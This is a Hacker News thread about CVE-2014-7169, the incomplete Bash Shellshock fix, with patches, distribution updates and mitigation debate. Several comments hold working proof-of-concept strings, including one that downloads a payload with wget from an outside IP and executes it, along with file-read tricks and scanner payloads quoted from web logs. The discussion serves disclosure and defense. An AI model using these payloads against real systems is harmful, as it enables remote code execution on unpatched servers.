CVE-2014-7169: Bash Fix Incomplete, Still Exploitable (seclists.org)
557 points by caust1c on Sept 25, 2014 | 210 comments



Proposed patch for CVE-2014-7169 here:

http://www.openwall.com/lists/oss-security/2014/09/25/10

I am building bash updates for Ubuntu containing the proposed fix here and will publish them once the fix has been made official:

https://launchpad.net/~ubuntu-security-proposed/+archive/ubu...


I'm wondering if it wouldn't be possible to still support "export -f" while making it harder for attackers to fake it out. For example, if "export -f foo" put the function body in an environment variable named "BASH_EXPORTED_FUNC_foo", instead of just "foo", then the next bash, on startup, wouldn't have to even attempt function-body parsing on environment variables which lack that prefix, including a lot of the currently trumpeted attack vectors (SSL_whatever, HTTP_whatever, TERM, SSH_ORIGINAL_COMMAND, etc.)
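
Concretely, the idea amounts to something like this (a sketch of the proposal only; the first part is what bash does today, the second part is hypothetical):

    # today, on a pre-fix bash, "export -f foo" travels under the function's own name:
    foo() { echo hi; }; export -f foo
    env | grep -c '^foo='     # prints 1: the body sits in a variable literally named "foo"
    # under the proposal the same body would instead be serialized as something like
    #   BASH_EXPORTED_FUNC_foo='() {  echo hi
    #   }'
    # and a child bash would only hand BASH_EXPORTED_FUNC_* values to its function parser,
    # so plain HTTP_*/SSL_*/TERM values would never reach it at all.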

This wouldn't be complete mitigation, and isn't a substitute for the current patches, but it could possibly reduce the attack surface for exploit of any similar remaining problems.

(I can imagine that someone, somewhere, has added an "export -f" env var to an AcceptEnv whitelist, or some such thing, and would need to change it, but that's probably a very rare situation.)

(Edited for clarity.)


For anyone landing here, mdeslaur and the Ubuntu team have now released a patch for CVE-2014-7169.

http://www.ubuntu.com/usn/usn-2363-1/


Debian stable is out as well.


Possibly stupid question, but won't Ubuntu also publish these as soon as the fix is made available?


mdeslaur is an Ubuntu security engineer.


Ahah, okay, makes sense. Thanks!

And THANK YOU SO MUCH for all your amazing work on this stuff, mdeslaur!


If you're following the instructions here: http://apple.stackexchange.com/questions/146849/how-do-i-rec...

...then this patch needs to be modified (different line numbers) before it can be applied to the Apple version of bash:

    --- parse.y.old 2014-09-25 13:42:17.000000000 +0300
    +++ parse.y    2014-09-25 13:41:39.000000000 +0300
    @@ -2503,6 +2503,8 @@
       FREE (word_desc_to_read);
       word_desc_to_read = (WORD_DESC *)NULL;
    
    +  eol_ungetc_lookahead = 0;
    +
       last_read_token = '\n';
       token_to_read = '\n';
     }
Testing locally, this appears to mitigate both known (so far) vulnerabilities.


Steps to get the partial patch on ubuntu:

  sudo add-apt-repository ppa:ubuntu-security-proposed/ppa
  sudo apt-get update
  sudo apt-get upgrade
To get unattended auto-upgrades from that PPA:

  sudo apt-get install unattended-upgrades
  sudo dpkg-reconfigure unattended-upgrades
Then edit /etc/apt/apt.conf.d/50unattended-upgrades and add a line to the Allowed-Origins block that looks like

  "LP-PPA-ubuntu-security-proposed:precise";
Also make sure distro-codename-security is uncommented, and comment out the -updates one if you want. Then do this to make sure it all works:

  sudo unattended-upgrades --dry-run --debug


With the patched bash, if you run

    env X='() { (a)=>\' sh -c "echo date"
This is equivalent to running

    date >echo
That is, you can put something in the environment which causes it to drop the first token, run the result as a command, and redirect the result to the dropped first token.

An example of a context where this would be exploitable is a CGI webapp which accepts an uploaded zip file, stores it on a FAT filesystem, and runs system("unzip /path/to/file"). Then putting a corrupt string in a header would cause the file to be executed, rather than unzipped.
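
Since the flip is easy to miss, here is that scenario reconstructed locally (a sketch only: it needs a bash that still has this bug, sh must actually be bash, and /tmp/payload, /tmp/proof and the HTTP_X name are just placeholders):

    printf '#!/bin/sh\necho "executed instead of unzipped" > /tmp/proof\n' > /tmp/payload
    chmod +x /tmp/payload    # the uploaded file has to be executable for anything to happen
    env HTTP_X='() { (a)=>\' sh -c "unzip /tmp/payload"
    cat /tmp/proof           # present if the token-dropping bug fired
    ls -l unzip              # ...and the dropped first word became a file in the cwd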


Just as an aside - is there a particular reason you specify the type of the filesystem? Is there something specific to FAT that might make this exploit viable? I'm thinking permissions, but I'm not sure.


I think it's that all files have mode 0777, i.e. executable by default. I think it can be changed with mount options though.


Thanks a lot, I was discussing this with a friend and we reached this conclusion too.


You don't even need FAT if the CGI script doesn't properly escape spaces in filenames. e.g.:

    env X='() { (a)=>\' sh -c "unzip wget -O /tmp/hax 8.8.8.8:hax; chmod 777 /tmp/hax; /tmp/hax"
(the "filename" here being "wget -O /tmp/hax 8.8.8.8:hax; chmod 777 /tmp/hax; /tmp/hax")


This assumes that system() is calling bash, but it usually calls /bin/sh, which is often linked to something other than bash (for example, dash is used on recent Ubuntu and Debian installs).


Not always, this is on Slackware 14.1:

    $ ls -l /bin/sh 
    lrwxrwxrwx 1 _ _ 4 Apr  3 18:13 /bin/sh -> bash*


All my Ubuntu 14.04 systems have /bin/sh symlinked to bash, not dash. I'm seeing articles on the net about Ubuntu switching to dash, but as far as I can tell, it either was reverted, or never happened.


That's weird:

    $ lsb_release -a
    No LSB modules are available.
    Distributor ID:	Ubuntu
    Description:	Ubuntu 14.04.1 LTS
    Release:	14.04
    Codename:	trusty
    $ ls -l /bin/sh
    lrwxrwxrwx 1 root root 4 Feb 19  2014 /bin/sh -> dash


Hum. Strange. I just tested with clean Ubuntu EC2 instances, and they are indeed symlinking /bin/sh to dash.

Either I have a part of my standard stack that reverts it to bash (but I have no idea what could be doing that), or it could be my provider (OVH) doing that by default when they install Ubuntu.

Oh well, sorry for the noise.


I spun up an EC2 ubuntu 14.04 instance a few minutes ago - a quick check shows sh -> dash.

Are your systems fresh installs or dist-upgrades from older systems? I wonder if there's a difference there somehow. Or perhaps your puppet/chef/etc rules are changing to bash?


Ubuntu symlinks /bin/sh to /bin/dash by default as of some ancient version. This is pretty annoying and I often end up manually undoing it and linking it to /bin/bash when a script fails in spectacular ways (dash doesn't support some bash-specific niceties). It's merely a fortunate accident for Ubuntu that this type of bug was discovered in bash, not dash.


So those shell scripts use bashisms but don't use #!/bin/bash and instead have #!/bin/sh ?


The problematic scripts don't have a shebang at all, as you can likely guess. Would it be easier to add a shebang? If the one script was the only problem, yes, but I just see no compelling reason to leave my Ubuntu environments in an inconsistent state and risk experiencing other unusual behaviors. I'd rather my Ubuntu boxes behave in a similar fashion to all the other Linux environments I use, which all link /bin/sh to /bin/bash.

The justification I found when I looked up what was going on here was "dash makes boot times faster". That's fine, but I don't reboot my systems very often, and fractional reductions in boot time are not worth the potential work-time disruption to me.

None of that changes the fundamental fact here: these types of security bugs could happen in any low-level, system-fundamental project like a shell. Even if you say, "Nuh-uh, I would never evaluate functions out of environment variables if I was writing a shell", I guarantee there are other things you can mess up that would present serious security risks. It is just by dumb luck that bash is the culprit this time and not some other software, and that Ubuntu happens to link /bin/sh to a shell that doesn't have the same specific bug (because it lacks the feature that provides the attack surface).


Yes but fixing that is a simple matter of replacing sh with /bin/bash.


You can only do that if you already have shell access (in which case the vulnerability gives you nothing). The remote exploit works because untrusted users can put code into an environment variable, but the target needs to create a new bash to execute the code.


Hm.

On one hand, this is pretty specific and not "run into the woods" dangerous.

On the other hand, it's also not that unrealistic.

Also, I am kind of afraid there will be more stuff lurking in there.


It's almost like the shell was designed to execute arbitrary commands!


All this "echo date, cat echo" business is confusing.

Let me fix that for you.

    hobbes@metalbaby:~$ export badvar='() { (a)=>\'
    hobbes@metalbaby:~$ bash -c "somestring executeMe"
    bash: badvar: line 1: syntax error near unexpected token `='
    bash: badvar: line 1: `'
    bash: error importing function definition for `badvar'
    bash: executeMe: command not found
    hobbes@metalbaby:~$ cat somestring  #it exists but is empty.
    hobbes@metalbaby:~$ bash -c "somestring date"
    bash: badvar: line 1: syntax error near unexpected token `='
    bash: badvar: line 1: `'
    bash: error importing function definition for `badvar'
    hobbes@metalbaby:~$ cat somestring 
    Thu Sep 25 11:01:35 CDT 2014
    hobbes@metalbaby:~$ bash -c "somestring echo hello"
    bash: badvar: line 1: syntax error near unexpected token `='
    bash: badvar: line 1: `'
    bash: error importing function definition for `badvar'
    hobbes@metalbaby:~$ cat somestring 
    hello
Gititgotitgood? Great. Now how the heck does anybody think that is as bad as the first one?

For this one, an attacker needs to control both the environment AND the command line of the child shell.

People, if those criteria are met, the attacker wins, with or without bugs.

Yes, yes, there are situations where the attacker has partial control of the command line via a filename argument or whatever--whatever indeed! That's not even in the same category as the first bug.


Don't think "how can an attacker get me by prepending '>' or '<' to a commandline?" (You did realize that '<' is also possible, right? Did you check what else is possible?)

Think "the buggy bash parser is still exposed to an attacker, and nobody really knows what it can be made to do."


Yeah, I hear you.

Well let's see...

All of these work for me (bash 4.3 including yesterday's patches on Debian sid amd64):

    hobbes@metalbaby:~$ unset badvar; rm somefile; export badvar='() { (a)=>\'; bash -c "somefile echo tricksie"; cat somefile 
    hobbes@metalbaby:~$ unset badvar; rm somefile; export badvar='() { (b)=>\'; bash -c "somefile echo tricksie"; cat somefile 
    hobbes@metalbaby:~$ unset badvar; rm somefile; export badvar='() { (gooooooaaaal)=>\'; bash -c "somefile echo tricksie"; cat somefile 
    hobbes@metalbaby:~$ unset badvar; rm somefile; export badvar='() { (a).>\'; bash -c "somefile echo tricksie"; cat somefile 
    hobbes@metalbaby:~$ unset badvar; rm somefile; export badvar='() { (a)[>\'; bash -c "somefile echo tricksie"; cat somefile 
    hobbes@metalbaby:~$ unset badvar; rm somefile; export badvar='() { (a)=>\'; bash -c "somefile echo tricksie"; cat somefile 
    hobbes@metalbaby:~$ unset badvar; echo tricksie > inputfile; export badvar='() { (a)=<\'; bash -c "inputfile cat";


As a followup, someone finally did find a full-blown 'execute whatever you like' exploit for the patched version of bash.

http://lcamtuf.blogspot.com/2014/10/bash-bug-how-we-finally-...


The way I see it a sane but unfortunate programmer can cause a CVE, but you have to be insane to do what bash does with its environment. Why the HELL doesn't bash store inherited functions in an environment variable with a known name (e.g. "BASH_INHERITED_FUNCTIONS") like everybody else?!?

In my mind even this trivial example is a bug (albeit less serious from a security perspective):

  $ env VAR="() { This is how I like my VAR } ()" /bin/sh -c 'echo $VAR'
  /bin/sh: VAR: line 0: syntax error near unexpected token `('
  /bin/sh: VAR: line 0: `VAR () { This is how I like my VAR } ()'
  /bin/sh: error importing function definition for `VAR'
  
  $
Imagine an ABI that works like that: you can pass any string, as long as it doesn't start with "() {"... :/


    export badvar='() { (a)=>\'; bash -c "hackerfile echo vulnerable"; grep vulnerable hackerfile || echo safe


Earlier on a mailing list, someone pointed out that there is still an awful lot of string processing going on in bash even after this afternoon's fix. So further bugs are likely to be found, now that everyone is constantly sniffing around the place.


That was one of my first thoughts as well. There is way too much code that's being exposed here. This will be a gift that keeps on giving.

For people who want to do environment sanitation, do we know what values can trigger this 'feature'? Is it only "()" as the first two characters? First two non-whitespace characters?


Answering my own question, since I got curious enough to look at the source:

    if (privmode == 0 && read_but_dont_execute == 0 && STREQN ("() {", string, 4))
So it has to start with that four character sequence exactly.

I hope there are patches to webservers, sshd, etc to cleanse environment variables with that value. Even if bash is fixed, it is too risky to send untrusted strings to its parser.


Sudo already has a feature like this.

            /* Skip variables with values beginning with () (bash functions) */
            if ((cp = strchr(*ep, '=')) != NULL) {
                if (strncmp(cp, "=() ", 3) == 0)
                    continue;
            }


You are describing blacklisting known bad values. What about these?

    ()&#32;{
    ()+{

Would those make it through? I don't know, and neither does the person writing the WAF.


Can someone explain why bash is evaluating and looking for function definitions in every environment variable? What would be broken if this entire "feature", whatever it is, was completely disabled?

That's almost like a C compiler looking for C programs in string literals. It just doesn't make sense to me.


It's so you can export a function into child shells:

http://stackoverflow.com/questions/1885871/exporting-a-funct...

Hardly worth the security cost in retrospect, but some bash scripts will surely break if it were just ripped out.
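
For anyone who hasn't seen the feature in action, a minimal demo (dash's exact error text varies by version; the point is that only bash rebuilds the function in the child):

    greet() { echo "hello from the parent"; }
    export -f greet
    bash -c greet    # the child bash reconstructs greet from the environment and runs it
    dash -c greet    # shells without the feature just see an oddly shaped variable: "greet: not found"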


Seems like something that should be turned off by default and enabled when desired/needed.


I was thinking the same thing – if there ever was a case for a "bash --allow-terribly-insecure-features" flag this is it.


Don't use bash as a system or scripting shell, then - that's exactly why dash or the BSD shells exist. Exporting functions makes no real sense anyway; at least if you did it by hand it would be obvious how dangerous it is.


From reading one of the threads I think I get it. It allows you to "export" functions (export -f). I guess that's passed via the environment, so bash scans for them at process start.

The issue is that it was evaluating the whole variable to import them into your process. So if you have "garbage" at the end, it's interpreted as the next command following the function definition.


What tools are people using to track and push out security updates, if any? Right now I only have a few servers to administer so apticron is sufficient for notification and upgrading isn't a burden.

Also, does anyone have a way to push out patched packages fast? Imagine that a patch is available, or it's trivial to remove a feature that you're not using, but the distribution hasn't made a package yet. I have been dreaming of making a system to help debian users create and manage a local set of packages, but haven't really had a chance to take it to a point where it'd be helpful in this scenario.

My extended thoughts on the matter: http://stevenjewel.com/2013/10/hacking-open-source/


On Debian or Ubuntu, install the unattended-upgrades package. Configure it to install security updates only.

> ...but the distribution hasn't made a package yet.

On Ubuntu, I think you can probably set up a Launchpad PPA and then configure unattended-upgrades to automatically pull from it. Then just push what you need to that PPA when you're ready.

If you want to host the repository elsewhere, then that's possible too, but you probably want to start with a PPA since you don't have to worry about build and publishing infrastructure to start off with.


For anyone who doesn't know, there's also a similar "yum-updatesd" for RHEL and derivatives like CentOS, though it only gives notifications of updates IIRC.


Since I'm an Ubuntu user, I use Landscape to keep my system up-to-date: https://landscape.canonical.com/

It did the patching for me during the night (I told it to do so for security updates), so I woke up to already patched systems.

Full disclaimer: I work for Canonical.


I have no interest in paying for Ubuntu Advantage. I would happily pay a reasonable amount for just Landscape, but Canonical doesn't offer that. Get your sales guys to fix that, and you'll end up with a lot more Landscape users. Or better yet, just open source Landscape.


I would also be interested in a landscape only package at a reasonable price.


+1. Landscape has gotten zero serious evaluation at our company completely because of their heavy-handed pricing arrangement.


I seem to have woken up to a patched system too, i.e.

    Start-Date: 2014-09-25  06:53:13
    Upgrade: libnss3-1d:amd64 (3.17-0ubuntu0.14.04.1, 3.17.1- 0ubuntu0.14.04.1), libnss3-nssdb:amd64 (3.17-0ubuntu0.14.04.1, 3.17.1-0ubuntu0.14.04.1), bash:amd64 (4.3-7ubuntu1, 4.3-7ubuntu1.1), libnss3:amd64 (3.17-0ubuntu0.14.04.1, 3.17.1-0ubuntu0.14.04.1)
I am a happy Ubuntu user, but I think in this case "unattended-upgrade" might have been enough?
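
If you're ever unsure whether it was unattended-upgrades (rather than Landscape or a human) that did the deed, the apt logs are the place to look, e.g.:

    grep -B3 'bash' /var/log/apt/history.log          # the Commandline: line shows who asked for it
    less /var/log/unattended-upgrades/unattended-upgrades.log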


How much does Landscape cost? I honestly can't figure it out.

The only thing I saw was ~$300 per server... most of my servers didn't cost anywhere near $300...


You can't buy Landscape directly, sadly... You have to pay for Ubuntu Advantage, which is their support offering, which is why it's a ridiculous $$$ per server.


If Landscape were cheaper I would try using it as well, but since it's not, I'm using Ansible.


Shameless plug as the owner: https://sysward.com/ - this is one of the reasons I built this - there is even a package view so you can apply just this package update across your systems. Message me if you have any questions!


I have a security warning from Chrome on my phone as of now. Maybe you want to look into that!



No warnings about SSL on iPhone Safari. Are you on Android?

(Disclaimer: not affiliated with Sysward)


Thanks for the heads up - I'll take a look!


If you use one of several popular cheap SSL providers, you need to add some intermediate certs to your server's SSL store or Android will show those warnings. It's pretty lame.

https://knowledge.rapidssl.com/support/ssl-certificate-suppo...


I typically use the CVE RSS feeds http://nvd.nist.gov/download/nvd-rss.xml and plug them into an IRC bot.


Great idea. Setup IFTTT to do the same to a Slack channel: https://ifttt.com/recipes/206224-post-nvd-vulnerability-noti...


Doesn't Slack have its own RSS bot? Why not use that?


Ah cool didn't know Slack had RSS integration.


Plug: While we don't support alerts of security incidents, you can use https://commando.io to easily execute yum -y update bash or apt-get upgrade -y bash on groups of servers. We also integrate with DigitalOcean, AWS, and Rackspace.

See the following tweet: https://twitter.com/alexandermensa/status/514811145887027201


Using salt to push out updates, easy and fast: "salt '*' pkg.install bash refresh=True"


Am I reading this right? If a string starts with the characters '() {', it is handled differently by the interpreter?

What am I meant to do if I actually want to store the characters '() {' in a string?


Welp, I'm about to take a hammer to all of my data centers and get busy, then move deep into the woods. Good luck to everybody else who decides to leave their equipment functioning; it was nice knowing you.


Reproduced from my comment on the discussion of the previous CVE

The same trick can be used to read files as well

  $ date -u > file1
  $ env -i X='() { (a)=<\' bash -c 'file1 cat'
  bash: X: line 1: syntax error near unexpected token `='
  bash: X: line 1: `'
  bash: error importing function definition for `X'
  Thu Sep 25 02:14:30 UTC 2014 
Though obviously it's going to be trickier to find a system that issues commands in a way that can act as a path for that sort of exploit.


[deleted]


I think you screwed up your test, I have not managed to get it to work with the LD_PRELOAD workaround installed.


The response from Ubuntu 14.04:

    user@user:~/ X
    X: user not authorized to run the X server, aborting.


I guess you are running remotely or you didn't use sudo!


Does anyone know what Apple's policy on fixing this might be? I understand why they ship an older version of bash and other GNU userspace tools, but is there a precedent they've set for backporting?


They won't have to backport the fix; there is a patch directly against bash-3.2 (which ships in OS X): http://ftp.gnu.org/pub/gnu/bash/bash-3.2-patches/bash32-052

They do update bash occasionally, even though it is trapped forever in a pre-GPLv3 world: http://www.opensource.apple.com/source/bash/. For instance, bash-86.1 shipped in 10.8 and bash-92 shipped in 10.9.

I don't know if they will hop right on this (and personally I find the issue overblown), but I imagine it will get patched at some point.


OS X does use bash as /bin/sh, unfortunately, so it is fairly vulnerable. Probably most people won't be affected though, since there aren't many good attack vectors against a client machine, and not many people are still using Macs as servers.

I don't think that the issue is overblown at all though. CGI is old and crusty but it's sitting in all sorts of random places. All you need to do is to find a script that will call system()/popen()/etc and it's game over. Plus those are just the sorts of forgotten environments that people won't remember to patch. I'm sure there will be thousands of exploitations in the next couple days. This is a big deal.


bash on OSX is vulnerable, but as you say, there are few attack vectors. A client OSX machine with a stock config is not vulnerable. At a minimum, you have to enable a network service like printer sharing (CUPS), remote login (ssh), web sharing (Apache).

Then you have to configure the service in such a way to actually be vulnerable, and these are not commonly configured options.

The attacker also has to have a local privilege escalation vulnerability to exploit as well, or they're trapped as the CUPS user once they do bust in.

I don't think that the level of panic I have seen on other Hacker News threads and elsewhere on the Internet is warranted. Comparing this to Heartbleed is pretty absurd; TLS vs bash CGI is no contest in terms of deployment size.

I'm mainly concerned with public-facing, large scale web services, and in that area:

1. CGI in general and bash CGI in particular are basically unheard of.

2. system() in other scripting languages might be used, BUT to be vulnerable you have to pass through user-supplied data as environment variables without sanitizing. This was always an exploit waiting to happen.

3. ssh accounts with a command forced in authorized_keys are potentially problematic, but this would only be from users who have some relationship to your service in the first place. Personally I think a restricted shell (rsh or git-shell or whatever) is a more common option, simply because who knows what bash might get up to.

4. DHCP client scripts on Linux is an interesting exploit path, and might be a problem for laptops on shared wifi, but for the majority of Linux servers there is no attack vector. They live on controlled networks where rogue DHCP servers can't be operated.

So yes, patch the vulnerability and audit your systems and code. Also keep the response proportional to the vulnerability, this one needs a lot of other things to fall into place to be exploited.


I generally agree with this, but I do have a few nitpicks.

> Comparing this to Heartbleed is pretty absurd

They're such different bugs that they're hard to compare. Heartbleed definitely affected more high-value targets; however, the exploit just gave you some RAM contents. It would still be some manual work to figure out what those values meant (which bits are ssh keys, which are passwords, ...) and leverage them. Shellshock is much better suited for a "sweep all of IPv4, build a botnet" scriptkiddie attack.

> bash CGI in particular are basically unheard of

The CGI doesn't have to be written in bash, it just has to call something that calls something that ends up calling system()/popen()/whatever. There are probably lots of such cases. Once httpd puts the poisonous string in your environment it's going to be passed down to all of your subprocesses. If you're using CGI at all on a machine with /bin/sh==bash you should assume you're vulnerable.

> They live on controlled networks where rogue DHCP servers can't be operated.

If you're on a network with nodes you don't trust (public wifi, large corporate networks, etc) there is a risk that machines other than the router will reply to broadcast DHCP requests. I don't know the full scope of this attack vector yet but I wouldn't be blasé about it.


> They're such different bugs that they're hard to compare.

I mentioned it because people are having a field day comparing the two (which results in some good old fashioned fear mongering). A random sampling:

  CNet: 'Bigger than Heartbleed'
  Gizmodo: Why the Bash Shellshock Bug Could Be Even Worse Than Heartbleed
  Mashable: Shellshock: The 'Bash Bug' That Could Be Worse Than Heartbleed
  The Independent: Shellshock: Bash bug 'bigger than Heartbleed' could undermine security of millions of websites
  Errata Security: Bash bug as big as Heartbleed
> The CGI doesn't have to be written in bash

This was covered in my second item, about using system(). I'm certain that there is software out there that does this, but it is in no way common, nor has it ever been best practice.

The panic over this presumes that people use CGI all the time. It's awful, it's always been awful, and should never be used for anything public facing for lots of other reasons. Note that FastCGI is not impacted.

> If you're on a network with nodes you don't trust

Correct, but this isn't the case for most (but not all) server deployments. In your own datacenter environment, you control the network and all of the hosts on it -- if someone busts in to run a DHCP server, you have bigger fish to fry.


I'm starting to see automated attack attempts using HTTP_HOST headers set to '() {'.


Are you seeing any from IP addresses besides 209.126.230.72, which is Robert Graham scanning the Internet[1]?

[1] http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-in...


The Metasploit folks released their exploit not too long ago. I haven't had any hits monitoring my Apache logs all day until just recently. Good luck/god bless to everybody.


I am seeing:

  web22 ~> grep "() {" logs/access_log
  209.126.230.72 - - [24/Sep/2014:17:16:46 -0700] "GET / HTTP/1.0" 200 5733 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" 13378 () { :; }; ping -c 23 209.126.230.74 80 74529


Thanks for that command btw; I got scanned by erratasec :D

    209.126.230.72 - - [24/Sep/2014:23:13:20 +0200] "GET / HTTP/1.0" 200 29301 "() { :; }; ping -c 11 216.75.60.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"
    209.126.230.72 - - [25/Sep/2014:08:45:00 +0200] "GET / HTTP/1.0" 200 29292 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"


very interesting one: 89.207.135.125 - - * () { :;}; /bin/ping -c 1 198.101.206.138"


Yes, I had that one too, also this:

    24.251.197.244 - - [25/Sep/2014:10:07:47 +0000] "GET / HTTP/1.1" 301 178 "-" "() { :; }; echo -e \x22Content-Type: text/plain\x5Cn\x22; echo qQQQQQq"


Yes, I got that too.

>89.207.135.125 - - - "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 302 483 "-" "() { :;}; /bin/ping -c 1 198.101.206.138"

...searching for vulnerable CPanel installs.


I've seen 89....125 as well, bastard.

Let's all ping 198...138!


I got mine!

    access.log.1:209.126.230.72 - - [25/Sep/2014:02:14:12 +0000]
    "GET / HTTP/1.0" 502 172 "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)"


My logs show 3 scans of this so far.


RHEL made a C shared object available that you can preload into everything; it cleans the magic "() {" bit out of the environment: https://access.redhat.com/articles/1200223 (and apparently exactly that sequence has magic meaning; "( ) {" does not work)

For CGI scripts, only putting it in /etc/ld.so.preload worked for me. It seems like the CGI environment has LD_PRELOAD stripped (I checked /proc/<apache_pid>/environ, which has LD_PRELOAD, but the running CGI script's environment does not).
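
A handy way to see which processes actually ended up with the scrubbed environment (essentially the /proc check mentioned above, made grep-able; the pid is whichever Apache child or CGI process you care about):

    pid=12345    # <- put the real pid here
    tr '\0' '\n' < /proc/$pid/environ | grep -E 'LD_PRELOAD|=\(\) \{'
    # the second alternative matches any variable whose value still starts with "() {"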


Is this an alternative to the bash upgrade or is this needed to fix the issue after the bash upgrade (because of an incomplete patch)?


It's a workaround that should be used if you must mitigate the issue right at this moment. Applying the update, once it's available, should do the same thing. Note that the workaround might have some unintended consequences as mentioned in the FAQ section of [1].

[1] https://access.redhat.com/articles/1200223


It looks like the important part of the patch (bash43-025) is here:

In builtins/evalstring.c:

    if ((flags & SEVAL_FUNCDEF) && command->type != cm_function_def)

In variables.c:

    parse_and_execute (temp_string, name, SEVAL_NONINT|SEVAL_NOHIST|SEVAL_FUNCDEF|SEVAL_ONECMD);
So what the patch does is create a special mode of parse_and_execute() where it's supposed to only evaluate function definitions. A better option would be to add a flag to parse_and_execute() that stops it from attempting any execution at all, rather than merely restricting it to function definitions.


Wouldn't that break the feature? Function definitions need to be executed so that they are available, right?


By "execution" I meant the execution of arbitrary code, either shell builtins or other programs, the original point of this vulnerability. Function definitions should really be thought of as being evaluated to make them available for future use.


The exploit worked against my cgi perl scripts as well!

I had cgi-bin/update.pl running on OS X and I exploited it as mentioned here: https://twitter.com/hernano/status/514866681530023936

My perl scripts call $out = `git pull`, log to a file, and print a response; I was quite surprised the exploit worked against them. Promptly disabled, upgraded bash, and re-enabled, now disabling all cgi for a bit longer.

What are the common vectors beyond CGI-space for the average server? How do we find and test them?


Yes, this exploit can be used on any script or program that uses system(), whatever language you use.

Using bash as the default /bin/sh is the real bug here.
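
A few quick (and far from exhaustive) things worth checking on a box you're unsure about; the paths assume a Debian-ish layout and will vary:

    readlink -f /bin/sh                                          # is sh really bash here?
    grep -rl 'system\|popen\|`' /usr/lib/cgi-bin/ 2>/dev/null    # CGI programs that shell out
    grep -n 'command=' /home/*/.ssh/authorized_keys 2>/dev/null  # forced ssh commands
    grep -n 'ForceCommand' /etc/ssh/sshd_config 2>/dev/null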


"Yes, this exploit can be used on any script or program that uses system(), whatever language you use."

Unless that script or program sanitizes the environment before calling system(). In practice there might not presently be any scripts or programs that do, but in principle it's a tiny bit weaker than you say.


Not sure if it helps against this vulnerability, but using Git::Wrapper [1] makes for much nicer code than backticks.

[1] https://metacpan.org/pod/Git::Wrapper


Awesome, thanks. Seems like it would've.


Perl backticks and system() delegate commands to the system shell, normally sh. On many systems, sh is simply bash in compatibility mode. That's how the attacker gets at the vulnerability.


Nice that "compatibility mode" does not bother to disable this technically non compatible behaviour...


Thanks. Suspected as much, but still a bit petrified that the shell var/func passed through perl to the backtick-shell.


system() delegates to the shell only when given a single argument; the list form doesn't go through the shell.


OK - so assuming that there isn't going to be a single patch which fixes all possible / related bugs any time soon.

Options?

- Change /bin/sh to something else. (CentOS has bash as default, alas...)

- Filter out unknown or suspicious-looking HTTP vars / env vars at the varnish/apache/nginx level, somehow... (doesn't stop other services)

- Figure out some clever SELinux configuration that blocks it.

I wonder how much would fail on switching out BASH as default sh?


I just followed the following instructions on Arch for replacing bash with dash:

https://wiki.archlinux.org/index.php/Dash

The technique is applicable to other distributions as well.

Note: on my Arch install the checks showed there were no scripts relying on /bin/sh being bash.

Edit: direct link to checkbashisms.pl - http://anonscm.debian.org/cgit/collab-maint/devscripts.git/p...


You want to actually remove bash, god forbid something calls /bin/bash directly instead of going through the /bin/sh link.


Ubuntu 10.04LTS has dash as the default shell, as does Debian Squeeze (oldstable).


The default /bin/sh, but NOT the default login shell. Those are two very different things.


> I wonder how much would fail on switching out BASH as default sh?

Ubuntu did that years ago, to speed up booting.


Yes, and in doing so they (well, Debian) upstreamed a lot of fixes for bashisms, so most system stuff is ok.

Apparently a lot of node.js stuff uses #!/bin/bash explicitly in scripts, so removing bash entirely might be difficult if you use node, or other stuff.


A little off topic, but am I still vulnerable?

I'm running OS X Mavericks 10.9.5, use zsh as my default shell, and have a patched version of bash built from the Homebrew repo set as secondary in /etc/shells (on the occasions I need bash, I like to have completions). System bash is still vulnerable. With my current configuration, how worried should I be?

Any insight is appreciated!


Yes, you are still vulnerable. I happen to be on Mountain Lion instead of Mavericks, but you can easily check yourself.

  $ /bin/sh --version
  GNU bash, version 3.2.48(1)-release (x86_64-apple-darwin12)
  Copyright (C) 2007 Free Software Foundation, Inc.
As long as you have a /bin/sh or /bin/bash that is of a vulnerable version, then any shell script which begins with #!/bin/sh or #!/bin/bash, and is executed in an environment that could have environment variables set by an attacker, could leave you vulnerable.

Installing a version via homebrew and setting it up in /etc/shells doesn't help. What you need to do is replace /bin/sh and /bin/bash. I don't know what effects this will have; it will likely work fine, but if you were to try it, I'd recommend backing up the old buggy versions first, so you could restore them if something went wrong. I'd also recommend replacing them with a version as close as possible to what you're replacing, with just the one patch applied, as there may be scripts which behave subtly differently in Bash 4 vs the Bash 3 that ships with OS X.
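
For what it's worth, the swap itself is only a couple of commands once you have a patched build (the /usr/local/bin path is just where a typical local build lands; adjust to wherever yours went):

    sudo cp /bin/bash /bin/bash.orig && sudo cp /bin/sh /bin/sh.orig   # keep the vulnerable originals around
    sudo cp /usr/local/bin/bash /bin/bash
    sudo cp /usr/local/bin/bash /bin/sh    # OS X's /bin/sh is a bash build as well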


I went ahead and recompiled a patched version of system bash as described in this SE thread: https://apple.stackexchange.com/questions/146849/how-do-i-re.... Thanks!


I'm not completely sure, but from what I understand, unless you have some CGI shell scripts on a webserver running on your machine (or another way for someone to invoke bash with custom environment vars), you're fine.



I found some exploit probes from a server called datacards.org. Happened on a server located in Germany. It's some kind of personal data gathering system (National Defense University DataCards).

http://home.comcast.net/~dshartley3/DIMEPMESIIGroup/Data.htm http://discussions.sisostds.org/threadview.aspx?threadid=533...

Should be limited to Afghanistan and stuff.


OK two questions:

1. Does zsh (or other shells) also have this kind of string processing where bugs are likely?

2. Is there a way to completely remove bash from the system and use zsh (or other shells) instead?


1. This exact bug, I dunno? From what I know about zsh, no, but what I don't know about zsh can fill books. But general string bugs? Probably. String processing is hard.

2. Possible yes, practical no (for most folks). Almost everybody's got a bunch of scripts with `#! /bin/bash` or `#! /usr/bin/env bash` lying around. Good luck excising everything that automatically assumes it's the shell of choice.


`ln -s /bin/zsh /bin/bash`?


Which would instantly break any script which uses bashisms.


It really depends on the *nix you are running.

FreeBSD, for example, only had bash as a port and it is not in the base install -- I believe `/bin/sh` is a derivative of ash[1].

[1]: http://en.wikipedia.org/wiki/Almquist_shell


